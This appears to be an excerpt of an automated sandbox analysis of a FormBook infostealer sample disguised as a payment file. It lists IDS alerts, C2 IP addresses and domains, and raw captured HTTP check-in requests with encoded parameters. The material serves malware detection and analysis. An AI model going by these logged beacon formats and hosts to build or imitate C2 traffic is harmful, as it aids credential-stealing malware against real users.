            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53654 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53627 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53630 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53642 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53672 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53663 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53618 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53618 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53620 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53665 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53634 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53642 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53634 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53671 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53674 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53628 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53674 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53626 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53626 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53632 -> 63.250.47.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53673 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53638 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53650 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53641 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53624 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53666 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53650 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53638 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53666 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53622 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53622 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53647 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53639 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53668 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53659 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53653 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53657 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53636 -> 91.184.0.200:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53670 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53670 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53651 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53667 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53661 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53664 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:53669 -> 148.72.152.174:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:53658 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:53658 -> 85.159.66.93:80
            Source: Joe Sandbox ViewIP Address: 63.250.47.40 63.250.47.40
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewIP Address: 91.184.0.200 91.184.0.200
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
            Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PAGO $830.900.exeCode function: 0_2_00DECD62 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00DECD62
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 18 Sep 2024 14:20:26 GMTserver: Apacheset-cookie: __tad=1726669226.5409498; expires=Sat, 16-Sep-2034 14:20:26 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 18 Sep 2024 14:20:29 GMTserver: Apacheset-cookie: __tad=1726669229.4590276; expires=Sat, 16-Sep-2034 14:20:29 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 18 Sep 2024 14:20:32 GMTserver: Apacheset-cookie: __tad=1726669232.6762876; expires=Sat, 16-Sep-2034 14:20:32 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 581content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 10 98 27 56 34 99 64 dc 04 93 d6 3d 14 25 67 cb d6 c8 76 a6 a7 38 bf 4c 1c fa 4d 4b e1 fc 01 c2 7e 2c ec 82 ce 60 27 39 3f 22 b2 ad f6 a1 d8 d7 6a 39 c0 54 8b f2 c9 52 fa ec 6e 7a 3c 7d 5b bb 42 99 81 10 74 1f 80 b1 aa 49 d1 b9 a1 e3 ff 7e 87 a1 ab 2f 07 8f f6 3c cb b0 b2 15 37 1a 02 76 ed ec c6 54 8b b3 cb d9 a5 9a 5f c1 01 18 3d 80 98 36 5e 8c 01 bd 5a 2b db 5a 57 c4 67 f5 b0 62 08 73 cb db d9 b0 78 6a f3 4a 6f 61 e0 16 49 a5 3d ab df 2f c0 58 83 cb a4 cc 25 34 0e eb e2 0d 53 1c e6 61 9e 94 9f 5b ad ee a0 41 87 c3 b8 1a 42 97 0b c9 97 88 ab 70 2d 63 47 4f 79 87 c4 c9 39 ed 05 fe d9 e8 6d 11 73 1d ee 7f 13 03 8f 11 31 b1 88 67 4b f8 75 fd bd 78 5b ed 0f e1 a6 9e d2 73 17 82 fd a1 1b e1 6f f1 08 0f 59 bd ae 34 04 00 00 Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4
            Source: global trafficHTTP traffic detected: GET /2jit/?x0wHoJ8X=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1fIExehuCYopzYdrD7nSEUYrIRB0qkneaQhNiSOa9oBZv5w==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.elsupertodo.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.omexai.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.tekilla.wtfConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3qit/?x0wHoJ8X=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYdT0P+5RUfPK3QBy2V8RIR3qX5RHElk5NoP1SAVBTInHq3g==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bola88site.oneConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /nxfn/?2VDlJ=Z2VdhTx&x0wHoJ8X=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVS2aVeWkTweCwbKJYJa5ZpRDYExluaviz3hCAwKYGhMeZlQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.languagemodel.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /3bdq/?x0wHoJ8X=mPDvA1qI3GiuntP+47r7UbinyaAdWbB61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4ExiUknvodE5HLMgr3NywByQXC4D0E63F2IS7XJBOJFBCzN3g==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kexweb.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /ikh0/?2VDlJ=Z2VdhTx&x0wHoJ8X=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1jr66Q514zDlJHSMgPbfeUgvtl8EMtFUh5bwjyzdjbkT63w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jobworklanka.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /h7lb/?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dyme.techConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?x0wHoJ8X=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txGVJXSKSxkKFGk1ZeWgOOIZqPnSDvoqvGMyEebPgjbI83mQ==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSIDeX1TA==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.nobartv6.websiteConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /lrst/?x0wHoJ8X=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KQHyUFQSAc8UP525zlOX/aW9T9BNmWB7W/bov9uBpemVAjQ==&2VDlJ=Z2VdhTx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sailnway.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
